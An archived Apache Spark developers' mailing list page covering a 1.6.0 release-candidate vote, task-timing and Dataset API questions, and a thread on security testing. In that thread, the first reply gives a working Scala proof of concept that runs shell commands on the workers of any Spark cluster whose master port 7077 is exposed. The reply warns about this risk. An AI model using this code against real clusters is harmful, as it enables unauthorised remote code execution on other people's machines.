Re: security testing on spark ?

2015-12-18 Thread Akhil Das
If port 7077 is open to the public on your cluster, that's all an attacker
needs to take over the cluster. You can read a bit about it here:
https://www.sigmoid.com/securing-apache-spark-cluster/

You can also look at this small exploit I wrote
https://www.exploit-db.com/exploits/36562/
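
To make the risk concrete, here is a minimal sketch (the hostname is a
placeholder, and it assumes a matching Spark version on the classpath) of
how any client that can reach an open master port can run arbitrary shell
commands on the workers:

import org.apache.spark.{SparkConf, SparkContext}
import scala.sys.process._

object OpenMasterDemo {
  def main(args: Array[String]): Unit = {
    val conf = new SparkConf()
      .setMaster("spark://victim-host:7077") // any reachable open master
      .setAppName("innocuous-looking-app")
    val sc = new SparkContext(conf)
    // The closure below executes on a worker, with the worker's OS privileges.
    sc.parallelize(1 to 1, 1).foreach { _ =>
      println("id".!!) // runs a shell command on the worker
    }
    sc.stop()
  }
}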

Thanks
Best Regards

On Wed, Dec 16, 2015 at 6:46 AM, Judy Nash 
wrote:

> Hi all,
>
>
>
> Does anyone know of any effort from the community on security testing
> Spark clusters? For example:
>
> Static source code analysis to find security flaws
>
> Penetration testing to identify ways to compromise a Spark cluster
>
> Fuzzing to crash Spark
>
>
>
> Thanks,
>
> Judy
>
>
>


Re: Spark basicOperators

2015-12-18 Thread Akhil Das
You can pretty much measure it from the Event Timeline in the driver UI:
click on a job or a stage there and you can see how long each of its tasks
took.
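
If you want the numbers programmatically rather than from the UI, here is a
rough sketch (the class name is made up) that totals task time per stage
with a SparkListener; run the query of interest, then inspect the map:

import org.apache.spark.scheduler.{SparkListener, SparkListenerTaskEnd}
import scala.collection.mutable

// Sums the wall-clock duration of finished tasks, keyed by stage ID.
class StageTimeListener extends SparkListener {
  val stageTimeMs = mutable.Map.empty[Int, Long].withDefaultValue(0L)
  override def onTaskEnd(taskEnd: SparkListenerTaskEnd): Unit = synchronized {
    stageTimeMs(taskEnd.stageId) += taskEnd.taskInfo.duration
  }
}

val listener = new StageTimeListener
sc.addSparkListener(listener)
// ... run the query that exercises the operator you care about ...
listener.stageTimeMs.foreach { case (stageId, ms) =>
  println(s"stage $stageId: $ms ms of total task time")
}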

Thanks
Best Regards

On Thu, Dec 17, 2015 at 7:27 AM, sara mustafa 
wrote:

> Hi,
>
> The file org.apache.spark.sql.execution.basicOperators.scala contains the
> implementations of multiple operators. How can I measure the execution
> time of an individual operator?
>
> thanks,
>
>
>
> --
> View this message in context:
> http://apache-spark-developers-list.1001551.n3.nabble.com/Spark-basicOperators-tp15672.html
> Sent from the Apache Spark Developers List mailing list archive at
> Nabble.com.
>
> -
> To unsubscribe, e-mail: dev-unsubscr...@spark.apache.org
> For additional commands, e-mail: dev-h...@spark.apache.org
>
>


Re: [VOTE] Release Apache Spark 1.6.0 (RC3)

2015-12-18 Thread Daniel Darabos
+1 (non-binding)

It passes our tests after we registered 6 new classes with Kryo:


kryo.register(classOf[org.apache.spark.sql.catalyst.expressions.UnsafeRow])
kryo.register(classOf[Array[org.apache.spark.mllib.tree.model.Split]])
// The following classes are not publicly accessible, so they are
// registered by name:
kryo.register(Class.forName("org.apache.spark.mllib.tree.model.Bin"))
kryo.register(Class.forName("[Lorg.apache.spark.mllib.tree.model.Bin;"))
kryo.register(Class.forName("org.apache.spark.mllib.tree.model.DummyLowSplit"))
kryo.register(Class.forName("org.apache.spark.mllib.tree.model.DummyHighSplit"))

It also spams "Managed memory leak detected; size = 15735058 bytes, TID =
847" for almost every task. I haven't yet figured out why.


On Fri, Dec 18, 2015 at 6:45 AM, Krishna Sankar  wrote:

> +1 (non-binding, of course)
>
> 1. Compiled on OS X 10.10 (Yosemite) OK. Total time: 29:32 min
>  mvn clean package -Pyarn -Phadoop-2.6 -DskipTests
> 2. Tested pyspark, mllib (IPython 4.0)
> 2.0 Spark version is 1.6.0
> 2.1. statistics (min,max,mean,Pearson,Spearman) OK
> 2.2. Linear/Ridge/Lasso Regression OK
> 2.3. Decision Tree, Naive Bayes OK
> 2.4. KMeans OK
>Center And Scale OK
> 2.5. RDD operations OK
>   State of the Union Texts - MapReduce, Filter, sortByKey (word count)
> 2.6. Recommendation (MovieLens medium dataset ~1 M ratings) OK
>Model evaluation/optimization (rank, numIter, lambda) with
> itertools OK
> 3. Scala - MLlib
> 3.1. statistics (min,max,mean,Pearson,Spearman) OK
> 3.2. LinearRegressionWithSGD OK
> 3.3. Decision Tree OK
> 3.4. KMeans OK
> 3.5. Recommendation (MovieLens medium dataset ~1 M ratings) OK
> 3.6. saveAsParquetFile OK
> 3.7. Read and verify the 4.3 save (above) - sqlContext.parquetFile,
> registerTempTable, sql OK
> 3.8. result = sqlContext.sql("SELECT
> OrderDetails.OrderID,ShipCountry,UnitPrice,Qty,Discount FROM Orders INNER
> JOIN OrderDetails ON Orders.OrderID = OrderDetails.OrderID") OK
> 4.0. Spark SQL from Python OK
> 4.1. result = sqlContext.sql("SELECT * from people WHERE State = 'WA'") OK
> 5.0. Packages
> 5.1. com.databricks.spark.csv - read/write OK (--packages
> com.databricks:spark-csv_2.10:1.3.0)
> 6.0. DataFrames
> 6.1. cast,dtypes OK
> 6.2. groupBy,avg,crosstab,corr,isNull,na.drop OK
> 6.3. All joins,sql,set operations,udf OK
>
> Cheers & Good work guys
> 
>
> On Wed, Dec 16, 2015 at 1:32 PM, Michael Armbrust 
> wrote:
>
>> Please vote on releasing the following candidate as Apache Spark version
>> 1.6.0!
>>
>> The vote is open until Saturday, December 19, 2015 at 18:00 UTC and
>> passes if a majority of at least 3 +1 PMC votes are cast.
>>
>> [ ] +1 Release this package as Apache Spark 1.6.0
>> [ ] -1 Do not release this package because ...
>>
>> To learn more about Apache Spark, please see http://spark.apache.org/
>>
>> The tag to be voted on is v1.6.0-rc3
>> (168c89e07c51fa24b0bb88582c739cec0acb44d7)
>>
>> The release files, including signatures, digests, etc. can be found at:
>> http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-bin/
>>
>> Release artifacts are signed with the following key:
>> https://people.apache.org/keys/committer/pwendell.asc
>>
>> The staging repository for this release can be found at:
>> https://repository.apache.org/content/repositories/orgapachespark-1174/
>>
>> The test repository (versioned as v1.6.0-rc3) for this release can be
>> found at:
>> https://repository.apache.org/content/repositories/orgapachespark-1173/
>>
>> The documentation corresponding to this release can be found at:
>> http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-docs/
>>
>> ===
>> == How can I help test this release? ==
>> ===
>> If you are a Spark user, you can help us test this release by taking an
>> existing Spark workload and running on this release candidate, then
>> reporting any regressions.
>>
>> 
>> == What justifies a -1 vote for this release? ==
>> 
>> This vote is happening towards the end of the 1.6 QA period, so -1 votes
>> should only occur for significant regressions from 1.5. Bugs already
>> present in 1.5, minor regressions, or bugs related to new features will not
>> block this release.
>>
>> ===
>> == What should happen to JIRA tickets still targeting 1.6.0? ==
>> ===
>> 1. It is OK for documentation patches to target 1.6.0 and still go into
>> branch-1.6, since documentation will be published separately from the
>> release.
>> 2. New features for non-alpha-modules should target 1.7+.
>> 3. Non-blocker bug fixes should target 1.6.1 or 1.7.0, or drop the target
>> version.
>>
>>
>> ==
>> == Major changes to help you focus 

Re: [VOTE] Release Apache Spark 1.6.0 (RC3)

2015-12-18 Thread Sean Owen
For me, mostly the same as before: tests are mostly passing, but I can
never get the docker tests to pass. If anyone knows a special profile
or package that needs to be enabled, I can try that and/or
fix/document it. Just wondering if it's me.

I'm on Java 7 + Ubuntu 15.10, with -Pyarn -Phive -Phive-thriftserver
-Phadoop-2.6
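
Concretely, the invocation is roughly (exact goals may differ):

build/mvn -Pyarn -Phive -Phive-thriftserver -Phadoop-2.6 -DskipTests clean package
build/mvn -Pyarn -Phive -Phive-thriftserver -Phadoop-2.6 test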

On Wed, Dec 16, 2015 at 9:32 PM, Michael Armbrust
 wrote:
> Please vote on releasing the following candidate as Apache Spark version
> 1.6.0!
>
> The vote is open until Saturday, December 19, 2015 at 18:00 UTC and passes
> if a majority of at least 3 +1 PMC votes are cast.
>
> [ ] +1 Release this package as Apache Spark 1.6.0
> [ ] -1 Do not release this package because ...
>
> To learn more about Apache Spark, please see http://spark.apache.org/
>
> The tag to be voted on is v1.6.0-rc3
> (168c89e07c51fa24b0bb88582c739cec0acb44d7)
>
> The release files, including signatures, digests, etc. can be found at:
> http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-bin/
>
> Release artifacts are signed with the following key:
> https://people.apache.org/keys/committer/pwendell.asc
>
> The staging repository for this release can be found at:
> https://repository.apache.org/content/repositories/orgapachespark-1174/
>
> The test repository (versioned as v1.6.0-rc3) for this release can be found
> at:
> https://repository.apache.org/content/repositories/orgapachespark-1173/
>
> The documentation corresponding to this release can be found at:
> http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-docs/
>
> ===
> == How can I help test this release? ==
> ===
> If you are a Spark user, you can help us test this release by taking an
> existing Spark workload and running on this release candidate, then
> reporting any regressions.
>
> 
> == What justifies a -1 vote for this release? ==
> 
> This vote is happening towards the end of the 1.6 QA period, so -1 votes
> should only occur for significant regressions from 1.5. Bugs already present
> in 1.5, minor regressions, or bugs related to new features will not block
> this release.
>
> ===
> == What should happen to JIRA tickets still targeting 1.6.0? ==
> ===
> 1. It is OK for documentation patches to target 1.6.0 and still go into
> branch-1.6, since documentation will be published separately from the
> release.
> 2. New features for non-alpha-modules should target 1.7+.
> 3. Non-blocker bug fixes should target 1.6.1 or 1.7.0, or drop the target
> version.
>
>
> ==
> == Major changes to help you focus your testing ==
> ==
>
> Notable changes since 1.6 RC2
>
>
> - SPARK_VERSION has been set correctly
> - SPARK-12199 ML Docs are publishing correctly
> - SPARK-12345 Mesos cluster mode has been fixed
>
> Notable changes since 1.6 RC1
>
> Spark Streaming
>
> SPARK-2629  trackStateByKey has been renamed to mapWithState
>
> Spark SQL
>
> SPARK-12165 SPARK-12189 Fix bugs in eviction of storage memory by execution.
> SPARK-12258 correct passing null into ScalaUDF
>
> Notable Features Since 1.5
>
> Spark SQL
>
> SPARK-11787 Parquet Performance - Improve Parquet scan performance when
> using flat schemas.
> SPARK-10810 Session Management - Isolated default database (i.e. USE mydb)
> even on shared clusters.
> SPARK-  Dataset API - A type-safe API (similar to RDDs) that performs
> many operations on serialized binary data and code generation (i.e. Project
> Tungsten).
> SPARK-1 Unified Memory Management - Shared memory for execution and
> caching instead of exclusive division of the regions.
> SPARK-11197 SQL Queries on Files - Concise syntax for running SQL queries
> over files of any supported format without registering a table.
> SPARK-11745 Reading non-standard JSON files - Added options to read
> non-standard JSON files (e.g. single-quotes, unquoted attributes)
> SPARK-10412 Per-operator Metrics for SQL Execution - Display statistics on a
> per-operator basis for memory usage and spilled data size.
> SPARK-11329 Star (*) expansion for StructTypes - Makes it easier to nest and
> unnest arbitrary numbers of columns
> SPARK-10917, SPARK-11149 In-memory Columnar Cache Performance - Significant
> (up to 14x) speed up when caching data that contains complex types in
> DataFrames or SQL.
> SPARK-1 Fast null-safe joins - Joins using null-safe equality (<=>) will
> now execute using SortMergeJoin instead of computing a cartesian product.
> SPARK-11389 SQL Execution Using Off-Heap Memory - Support for configuring
> query execution to occur using off-heap memory to avoid GC overhead
> SPARK-10978 Datasource API Avoid Double Filter 

Re: [VOTE] Release Apache Spark 1.6.0 (RC3)

2015-12-18 Thread Tom Graves
+1.  Ran some regression tests on Spark on Yarn (hadoop 2.6 and 2.7).
Tom 


On Wednesday, December 16, 2015 3:32 PM, Michael Armbrust 
 wrote:
 

Please vote on releasing the following candidate as Apache Spark version
1.6.0!

The vote is open until Saturday, December 19, 2015 at 18:00 UTC and passes
if a majority of at least 3 +1 PMC votes are cast.

[ ] +1 Release this package as Apache Spark 1.6.0
[ ] -1 Do not release this package because ...

To learn more about Apache Spark, please see http://spark.apache.org/

The tag to be voted on is v1.6.0-rc3 (168c89e07c51fa24b0bb88582c739cec0acb44d7)

The release files, including signatures, digests, etc. can be found at:
http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-bin/

Release artifacts are signed with the following key:
https://people.apache.org/keys/committer/pwendell.asc

The staging repository for this release can be found at:
https://repository.apache.org/content/repositories/orgapachespark-1174/

The test repository (versioned as v1.6.0-rc3) for this release can be found at:
https://repository.apache.org/content/repositories/orgapachespark-1173/

The documentation corresponding to this release can be found at:
http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-docs/

===
== How can I help test this release? ==
===
If you are a Spark user, you can help us test this release by taking an
existing Spark workload and running on this release candidate, then
reporting any regressions.

===
== What justifies a -1 vote for this release? ==
===
This vote is happening towards the end of the 1.6 QA period, so -1 votes
should only occur for significant regressions from 1.5. Bugs already
present in 1.5, minor regressions, or bugs related to new features will not
block this release.

===
== What should happen to JIRA tickets still targeting 1.6.0? ==
===
1. It is OK for documentation patches to target 1.6.0 and still go into
branch-1.6, since documentation will be published separately from the
release.
2. New features for non-alpha-modules should target 1.7+.
3. Non-blocker bug fixes should target 1.6.1 or 1.7.0, or drop the target
version.

==
== Major changes to help you focus your testing ==
==
Notable changes since 1.6 RC2

- SPARK_VERSION has been set correctly
- SPARK-12199 ML Docs are publishing correctly
- SPARK-12345 Mesos cluster mode has been fixed

Notable changes since 1.6 RC1


Spark Streaming
   
   - SPARK-2629  trackStateByKey has been renamed to mapWithState

Spark SQL
   
   - SPARK-12165 SPARK-12189 Fix bugs in eviction of storage memory by 
execution.
   - SPARK-12258 correct passing null into ScalaUDF

Notable Features Since 1.5

Spark SQL
   
   - SPARK-11787 Parquet Performance - Improve Parquet scan performance when 
using flat schemas.
   - SPARK-10810 Session Management - Isolated default database (i.e. USE mydb) 
even on shared clusters.
   - SPARK-  Dataset API - A type-safe API (similar to RDDs) that performs 
many operations on serialized binary data and code generation (i.e. Project 
Tungsten).
   - SPARK-1 Unified Memory Management - Shared memory for execution and 
caching instead of exclusive division of the regions.
   - SPARK-11197 SQL Queries on Files - Concise syntax for running SQL queries 
over files of any supported format without registering a table.
   - SPARK-11745 Reading non-standard JSON files - Added options to read 
non-standard JSON files (e.g. single-quotes, unquoted attributes)
   - SPARK-10412 Per-operator Metrics for SQL Execution - Display statistics on 
a per-operator basis for memory usage and spilled data size.
   - SPARK-11329 Star (*) expansion for StructTypes - Makes it easier to nest 
and unnest arbitrary numbers of columns
   - SPARK-10917, SPARK-11149 In-memory Columnar Cache Performance - 
Significant (up to 14x) speed up when caching data that contains complex types 
in DataFrames or SQL.
   - SPARK-1 Fast null-safe joins - Joins using null-safe equality (<=>) 
will now execute using SortMergeJoin instead of computing a cartesian product.
   - SPARK-11389 SQL Execution Using Off-Heap Memory - Support for configuring 
query execution to occur using off-heap memory to avoid GC overhead
   - SPARK-10978 Datasource API Avoid Double Filter - When implementing a 
datasource with filter pushdown, developers can now tell Spark SQL to avoid 
double evaluating a pushed-down filter.
   - SPARK-4849  Advanced Layout of Cached Data - storing partitioning and 
ordering schemes in In-memory table scan, and adding distributeBy and localSort 
to DF API
   - SPARK-9858  Adaptive 

Re: [VOTE] Release Apache Spark 1.6.0 (RC3)

2015-12-18 Thread Sean Owen
Yes that's what I mean. If they're not quite working, let's disable
them, but first, we have to rule out that I'm not just missing some
requirement.

Functionally, it's not worth blocking the release. It seems like bad
form to release with tests that always fail for a non-trivial number
of users, but we have to establish that. If it's something with an
easy fix (or needs disabling) and another RC needs to be baked, might
be worth including.

Logs coming offline

On Fri, Dec 18, 2015 at 5:30 PM, Mark Grover  wrote:
> Sean,
> Are you referring to the docker integration tests? If so, they were
> disabled for the majority of the release cycle. I recently worked on them
> (SPARK-11796) and, once that got committed, the tests were re-enabled in
> Spark builds. I am not sure what OSs the test builds use, but they should
> be passing there too.
>
> During my work, I tested on Ubuntu Precise and they worked. If you could
> share the logs with me offline, I could take a look. Alternatively, I can
> try to get an Ubuntu 15 instance. However, given the history of these
> tests, I personally don't think it makes sense to block the release based
> on them not running on Ubuntu 15.
>
> On Fri, Dec 18, 2015 at 9:22 AM, Sean Owen  wrote:
>>
>> For me, mostly the same as before: tests are mostly passing, but I can
>> never get the docker tests to pass. If anyone knows a special profile
>> or package that needs to be enabled, I can try that and/or
>> fix/document it. Just wondering if it's me.
>>
>> I'm on Java 7 + Ubuntu 15.10, with -Pyarn -Phive -Phive-thriftserver
>> -Phadoop-2.6
>>
>> On Wed, Dec 16, 2015 at 9:32 PM, Michael Armbrust
>>  wrote:
>> > Please vote on releasing the following candidate as Apache Spark version
>> > 1.6.0!
>> >
>> > The vote is open until Saturday, December 19, 2015 at 18:00 UTC and
>> > passes
>> > if a majority of at least 3 +1 PMC votes are cast.
>> >
>> > [ ] +1 Release this package as Apache Spark 1.6.0
>> > [ ] -1 Do not release this package because ...
>> >
>> > To learn more about Apache Spark, please see http://spark.apache.org/
>> >
>> > The tag to be voted on is v1.6.0-rc3
>> > (168c89e07c51fa24b0bb88582c739cec0acb44d7)
>> >
>> > The release files, including signatures, digests, etc. can be found at:
>> > http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-bin/
>> >
>> > Release artifacts are signed with the following key:
>> > https://people.apache.org/keys/committer/pwendell.asc
>> >
>> > The staging repository for this release can be found at:
>> > https://repository.apache.org/content/repositories/orgapachespark-1174/
>> >
>> > The test repository (versioned as v1.6.0-rc3) for this release can be
>> > found
>> > at:
>> > https://repository.apache.org/content/repositories/orgapachespark-1173/
>> >
>> > The documentation corresponding to this release can be found at:
>> > http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-docs/
>> >
>> > ===
>> > == How can I help test this release? ==
>> > ===
>> > If you are a Spark user, you can help us test this release by taking an
>> > existing Spark workload and running on this release candidate, then
>> > reporting any regressions.
>> >
>> > 
>> > == What justifies a -1 vote for this release? ==
>> > 
>> > This vote is happening towards the end of the 1.6 QA period, so -1 votes
>> > should only occur for significant regressions from 1.5. Bugs already
>> > present
>> > in 1.5, minor regressions, or bugs related to new features will not
>> > block
>> > this release.
>> >
>> > ===
>> > == What should happen to JIRA tickets still targeting 1.6.0? ==
>> > ===
>> > 1. It is OK for documentation patches to target 1.6.0 and still go into
>> > branch-1.6, since documentation will be published separately from the
>> > release.
>> > 2. New features for non-alpha-modules should target 1.7+.
>> > 3. Non-blocker bug fixes should target 1.6.1 or 1.7.0, or drop the
>> > target
>> > version.
>> >
>> >
>> > ==
>> > == Major changes to help you focus your testing ==
>> > ==
>> >
>> > Notable changes since 1.6 RC2
>> >
>> >
>> > - SPARK_VERSION has been set correctly
>> > - SPARK-12199 ML Docs are publishing correctly
>> > - SPARK-12345 Mesos cluster mode has been fixed
>> >
>> > Notable changes since 1.6 RC1
>> >
>> > Spark Streaming
>> >
>> > SPARK-2629  trackStateByKey has been renamed to mapWithState
>> >
>> > Spark SQL
>> >
>> > SPARK-12165 SPARK-12189 Fix bugs in eviction of storage memory by
>> > execution.
>> > SPARK-12258 correct passing null into ScalaUDF
>> >
>> > Notable Features Since 1.5

Re: [VOTE] Release Apache Spark 1.6.0 (RC3)

2015-12-18 Thread Mark Grover
Thanks Sean for sending me the logs offline.

Turns out the tests are failing again, for reasons unrelated to Spark. I
have filed https://issues.apache.org/jira/browse/SPARK-12426 for that with
some details. In the meantime, I agree with Sean: these tests should be
disabled. And, again, I don't think these failures warrant blocking the
release.
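
Until they are disabled, anyone hit by this can exclude the module when
running tests, roughly like so (the module path is an assumption, and the
-pl exclusion needs Maven 3.2.1+):

build/mvn -Pyarn -Phive -Phive-thriftserver -Phadoop-2.6 \
  -pl '!external/docker-integration-tests' test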

Mark

On Fri, Dec 18, 2015 at 9:32 AM, Sean Owen  wrote:

> Yes that's what I mean. If they're not quite working, let's disable
> them, but first, we have to rule out that I'm not just missing some
> requirement.
>
> Functionally, it's not worth blocking the release. It seems like bad
> form to release with tests that always fail for a non-trivial number
> of users, but we have to establish that. If it's something with an
> easy fix (or needs disabling) and another RC needs to be baked, might
> be worth including.
>
> Logs coming offline
>
> On Fri, Dec 18, 2015 at 5:30 PM, Mark Grover  wrote:
> > Sean,
> > Are you referring to the docker integration tests? If so, they were
> > disabled for the majority of the release cycle. I recently worked on them
> > (SPARK-11796) and, once that got committed, the tests were re-enabled in
> > Spark builds. I am not sure what OSs the test builds use, but they should
> > be passing there too.
> >
> > During my work, I tested on Ubuntu Precise and they worked. If you could
> > share the logs with me offline, I could take a look. Alternatively, I can
> > try to get an Ubuntu 15 instance. However, given the history of these
> > tests, I personally don't think it makes sense to block the release based
> > on them not running on Ubuntu 15.
> >
> > On Fri, Dec 18, 2015 at 9:22 AM, Sean Owen  wrote:
> >>
> >> For me, mostly the same as before: tests are mostly passing, but I can
> >> never get the docker tests to pass. If anyone knows a special profile
> >> or package that needs to be enabled, I can try that and/or
> >> fix/document it. Just wondering if it's me.
> >>
> >> I'm on Java 7 + Ubuntu 15.10, with -Pyarn -Phive -Phive-thriftserver
> >> -Phadoop-2.6
> >>
> >> On Wed, Dec 16, 2015 at 9:32 PM, Michael Armbrust
> >>  wrote:
> >> > Please vote on releasing the following candidate as Apache Spark
> version
> >> > 1.6.0!
> >> >
> >> > The vote is open until Saturday, December 19, 2015 at 18:00 UTC and
> >> > passes
> >> > if a majority of at least 3 +1 PMC votes are cast.
> >> >
> >> > [ ] +1 Release this package as Apache Spark 1.6.0
> >> > [ ] -1 Do not release this package because ...
> >> >
> >> > To learn more about Apache Spark, please see http://spark.apache.org/
> >> >
> >> > The tag to be voted on is v1.6.0-rc3
> >> > (168c89e07c51fa24b0bb88582c739cec0acb44d7)
> >> >
> >> > The release files, including signatures, digests, etc. can be found
> at:
> >> >
> http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-bin/
> >> >
> >> > Release artifacts are signed with the following key:
> >> > https://people.apache.org/keys/committer/pwendell.asc
> >> >
> >> > The staging repository for this release can be found at:
> >> >
> https://repository.apache.org/content/repositories/orgapachespark-1174/
> >> >
> >> > The test repository (versioned as v1.6.0-rc3) for this release can be
> >> > found
> >> > at:
> >> >
> https://repository.apache.org/content/repositories/orgapachespark-1173/
> >> >
> >> > The documentation corresponding to this release can be found at:
> >> >
> http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-docs/
> >> >
> >> > ===
> >> > == How can I help test this release? ==
> >> > ===
> >> > If you are a Spark user, you can help us test this release by taking
> an
> >> > existing Spark workload and running on this release candidate, then
> >> > reporting any regressions.
> >> >
> >> > 
> >> > == What justifies a -1 vote for this release? ==
> >> > 
> >> > This vote is happening towards the end of the 1.6 QA period, so -1
> votes
> >> > should only occur for significant regressions from 1.5. Bugs already
> >> > present
> >> > in 1.5, minor regressions, or bugs related to new features will not
> >> > block
> >> > this release.
> >> >
> >> > ===
> >> > == What should happen to JIRA tickets still targeting 1.6.0? ==
> >> > ===
> >> > 1. It is OK for documentation patches to target 1.6.0 and still go
> into
> >> > branch-1.6, since documentation will be published separately from the
> >> > release.
> >> > 2. New features for non-alpha-modules should target 1.7+.
> >> > 3. Non-blocker bug fixes should target 1.6.1 or 1.7.0, or drop the
> >> > target
> >> > version.
> >> >
> >> >
> >> > ==
> >> 

Is there any way to select columns of Dataset in addition to the combination of `expr` and `as`?

2015-12-18 Thread Yu Ishikawa
Hi all, 

I have two questions about selecting columns of a Dataset.
First, could you let me know if there is any way to select TypedColumn
columns other than the combination of `expr` and `as`?
Second, how can we alias such an `expr("name").as[String]` column?

I tried to select a column of a Dataset the way I would with a DataFrame,
but I couldn't.

```
case class Person(id: Int, name: String)
val df = sc.parallelize(Seq((1, "Bob"), (2, "Tom"))).toDF("id", "name")
val ds = df.as[Person]

ds.select(expr("name").as[String]).show
+-----+
|value|
+-----+
|  Bob|
|  Tom|
+-----+

ds.select('id).show
<console>:34: error: type mismatch;
 found   : Symbol
 required: org.apache.spark.sql.TypedColumn[Person,?]
       ds.select('id).show

ds.select($"id").show
<console>:34: error: type mismatch;
 found   : org.apache.spark.sql.ColumnName
 required: org.apache.spark.sql.TypedColumn[Person,?]
       ds.select($"id").show

ds.select(ds("id")).show
<console>:34: error: org.apache.spark.sql.Dataset[Person] does not take
parameters
       ds.select(ds("id")).show

ds.select("id").show
<console>:34: error: type mismatch;
 found   : String("id")
 required: org.apache.spark.sql.TypedColumn[Person,?]
       ds.select("id").show
```
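
For what it's worth, two partial workarounds as an untested sketch
(assuming the usual sqlContext.implicits._ import):

```
// Several typed columns at once still work through expr/as:
val pairs = ds.select(expr("id").as[Int], expr("name").as[String])

// For aliasing, one option is to go through a DataFrame, alias there,
// and convert back to a typed Dataset:
val renamed = ds.toDF().select($"name".as("personName")).as[String]
```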

Best,
Yu



-
-- Yu Ishikawa
--
View this message in context: 
http://apache-spark-developers-list.1001551.n3.nabble.com/Is-there-any-way-to-select-columns-of-Dataset-in-addition-to-the-combination-of-expr-and-as-tp15713.html
Sent from the Apache Spark Developers List mailing list archive at Nabble.com.

-
To unsubscribe, e-mail: dev-unsubscr...@spark.apache.org
For additional commands, e-mail: dev-h...@spark.apache.org



Re: [VOTE] Release Apache Spark 1.6.0 (RC3)

2015-12-18 Thread Marcelo Vanzin
+1 (non-binding)

Tested the without-hadoop binaries (so didn't run Hive-related tests)
with a test batch including standalone / client, yarn / client and
cluster, covering core, mllib and streaming (flume and kafka).

On Wed, Dec 16, 2015 at 1:32 PM, Michael Armbrust
 wrote:
> Please vote on releasing the following candidate as Apache Spark version
> 1.6.0!
>
> The vote is open until Saturday, December 19, 2015 at 18:00 UTC and passes
> if a majority of at least 3 +1 PMC votes are cast.
>
> [ ] +1 Release this package as Apache Spark 1.6.0
> [ ] -1 Do not release this package because ...
>
> To learn more about Apache Spark, please see http://spark.apache.org/
>
> The tag to be voted on is v1.6.0-rc3
> (168c89e07c51fa24b0bb88582c739cec0acb44d7)
>
> The release files, including signatures, digests, etc. can be found at:
> http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-bin/
>
> Release artifacts are signed with the following key:
> https://people.apache.org/keys/committer/pwendell.asc
>
> The staging repository for this release can be found at:
> https://repository.apache.org/content/repositories/orgapachespark-1174/
>
> The test repository (versioned as v1.6.0-rc3) for this release can be found
> at:
> https://repository.apache.org/content/repositories/orgapachespark-1173/
>
> The documentation corresponding to this release can be found at:
> http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-docs/
>
> ===
> == How can I help test this release? ==
> ===
> If you are a Spark user, you can help us test this release by taking an
> existing Spark workload and running on this release candidate, then
> reporting any regressions.
>
> 
> == What justifies a -1 vote for this release? ==
> 
> This vote is happening towards the end of the 1.6 QA period, so -1 votes
> should only occur for significant regressions from 1.5. Bugs already present
> in 1.5, minor regressions, or bugs related to new features will not block
> this release.
>
> ===
> == What should happen to JIRA tickets still targeting 1.6.0? ==
> ===
> 1. It is OK for documentation patches to target 1.6.0 and still go into
> branch-1.6, since documentation will be published separately from the
> release.
> 2. New features for non-alpha-modules should target 1.7+.
> 3. Non-blocker bug fixes should target 1.6.1 or 1.7.0, or drop the target
> version.
>
>
> ==
> == Major changes to help you focus your testing ==
> ==
>
> Notable changes since 1.6 RC2
>
>
> - SPARK_VERSION has been set correctly
> - SPARK-12199 ML Docs are publishing correctly
> - SPARK-12345 Mesos cluster mode has been fixed
>
> Notable changes since 1.6 RC1
>
> Spark Streaming
>
> SPARK-2629  trackStateByKey has been renamed to mapWithState
>
> Spark SQL
>
> SPARK-12165 SPARK-12189 Fix bugs in eviction of storage memory by execution.
> SPARK-12258 correct passing null into ScalaUDF
>
> Notable Features Since 1.5
>
> Spark SQL
>
> SPARK-11787 Parquet Performance - Improve Parquet scan performance when
> using flat schemas.
> SPARK-10810 Session Management - Isolated default database (i.e. USE mydb)
> even on shared clusters.
> SPARK-  Dataset API - A type-safe API (similar to RDDs) that performs
> many operations on serialized binary data and code generation (i.e. Project
> Tungsten).
> SPARK-1 Unified Memory Management - Shared memory for execution and
> caching instead of exclusive division of the regions.
> SPARK-11197 SQL Queries on Files - Concise syntax for running SQL queries
> over files of any supported format without registering a table.
> SPARK-11745 Reading non-standard JSON files - Added options to read
> non-standard JSON files (e.g. single-quotes, unquoted attributes)
> SPARK-10412 Per-operator Metrics for SQL Execution - Display statistics on a
> per-operator basis for memory usage and spilled data size.
> SPARK-11329 Star (*) expansion for StructTypes - Makes it easier to nest and
> unnest arbitrary numbers of columns
> SPARK-10917, SPARK-11149 In-memory Columnar Cache Performance - Significant
> (up to 14x) speed up when caching data that contains complex types in
> DataFrames or SQL.
> SPARK-1 Fast null-safe joins - Joins using null-safe equality (<=>) will
> now execute using SortMergeJoin instead of computing a cartesian product.
> SPARK-11389 SQL Execution Using Off-Heap Memory - Support for configuring
> query execution to occur using off-heap memory to avoid GC overhead
> SPARK-10978 Datasource API Avoid Double Filter - When implementing a
> datasource with filter pushdown, developers can now tell Spark SQL to avoid
> double 

Re: [VOTE] Release Apache Spark 1.6.0 (RC3)

2015-12-18 Thread Denny Lee
+1 (non-binding)

Ran a number of tests covering DataFrames, Datasets, and ML.


On Wed, Dec 16, 2015 at 1:32 PM Michael Armbrust 
wrote:

> Please vote on releasing the following candidate as Apache Spark version
> 1.6.0!
>
> The vote is open until Saturday, December 19, 2015 at 18:00 UTC and
> passes if a majority of at least 3 +1 PMC votes are cast.
>
> [ ] +1 Release this package as Apache Spark 1.6.0
> [ ] -1 Do not release this package because ...
>
> To learn more about Apache Spark, please see http://spark.apache.org/
>
> The tag to be voted on is v1.6.0-rc3
> (168c89e07c51fa24b0bb88582c739cec0acb44d7)
>
> The release files, including signatures, digests, etc. can be found at:
> http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-bin/
>
> Release artifacts are signed with the following key:
> https://people.apache.org/keys/committer/pwendell.asc
>
> The staging repository for this release can be found at:
> https://repository.apache.org/content/repositories/orgapachespark-1174/
>
> The test repository (versioned as v1.6.0-rc3) for this release can be
> found at:
> https://repository.apache.org/content/repositories/orgapachespark-1173/
>
